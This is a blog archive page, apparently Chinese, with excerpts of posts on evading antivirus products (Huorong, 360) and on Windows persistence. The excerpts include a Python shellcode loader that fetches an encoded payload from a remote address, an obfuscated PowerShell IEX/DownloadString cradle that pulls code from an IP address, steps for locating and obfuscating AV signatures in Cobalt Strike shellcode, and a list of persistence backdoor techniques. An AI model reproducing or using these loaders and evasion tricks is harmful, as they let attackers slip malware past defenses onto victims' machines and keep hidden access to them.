2021年8月14日
常用过火绒,360,powershell加载器
摘要: 1. import ctypes import base64 import requests #shell需要先进行base64加密,再进行hex加密 code = requests.get("http://192.168.1.1/123.txt") shellcode = bytearray(ba 阅读全文
posted @ 2021-08-14 21:24 bingtanghulu 阅读(19) 评论(0) 推荐(0) 编辑
python shellcod加载器修改特征值
摘要: 首先网上找一个加载器 pyinstaller -F -w 1.py 进行打包,使用火绒或者360检测 分步排查 每次增加几行代码,逐步找到特征值 找到特征码 分字符函数进行排查,确定字符RltMoveMemory为特征值 RtlMoveMemory作用为从指定内存中复制内存至另一内存里 此时进行混淆 阅读全文
posted @ 2021-08-14 20:37 bingtanghulu 阅读(258) 评论(0) 推荐(0) 编辑
python shellcode免杀(过最新360,火绒,不过最新的windows))
摘要: 第一步cs生成python版测shellcode 第二步 提取双引号内容,并进行base64编码,放入python04.TXT 第三步 shellcode加载器修改地址,并进行base64加密,放入pythonshellcode.txt。同时将pythonshellcode.txt和python04 阅读全文
posted @ 2021-08-14 15:41 bingtanghulu 阅读(37) 评论(0) 推荐(0) 编辑
python shellcode 分析二
摘要: https://forum.90sec.com/t/topic/1587 分析shellcode 将shellcode生成后,使用base64编码,放入buf。将代码写入内存,所以需要将代码解码并转为字节类型。在64位系统上运行,必须使用restype函数设置VirtualAlloc返回类型为cty 阅读全文
posted @ 2021-08-14 14:35 bingtanghulu 阅读(102) 评论(0) 推荐(0) 编辑
python shellcode分析
摘要: https://blog.csdn.net/qq_32261191/article/details/108994177 分析shellcode ctypes是 Python 的外部函数库。它提供了与 C 兼容的数据类型,并允许调用 DLL 或共享库中的函数。可使用该模块以纯 Python 形式对这些 阅读全文
posted @ 2021-08-14 12:31 bingtanghulu 阅读(197) 评论(0) 推荐(0) 编辑
poweshell免杀---过火绒
摘要: 1.找到csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 2.找到System.Management.Automation.dll C:\Windows\assembly\GAC_MSIL\System.Managemen 阅读全文
posted @ 2021-08-14 11:16 bingtanghulu 阅读(19) 评论(0) 推荐(0) 编辑
powershell混淆免杀--过360,火绒
摘要: 最终结果 windows10 echo set-alias -name hhh -value IEX;hhh(New-Object "NeT.WebC`li`ent")."Down`l`oadStr`ing"('ht'+'tP://10’+'1.34.38.1'+'89/a') | %psmodul 阅读全文
posted @ 2021-08-14 10:06 bingtanghulu 阅读(39) 评论(0) 推荐(0) 编辑
windows权限维持
摘要: 一 注册表 二 计划任务 三 服务 四 影子账户和激活guest 五 快捷键位 六 镜像劫持 七 屏幕保护程序 八 dll劫持 九 wmi后门 一、注册表 打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下新建一个开 阅读全文
posted @ 2021-08-14 00:20 bingtanghulu 阅读(272) 评论(0) 推荐(0) 编辑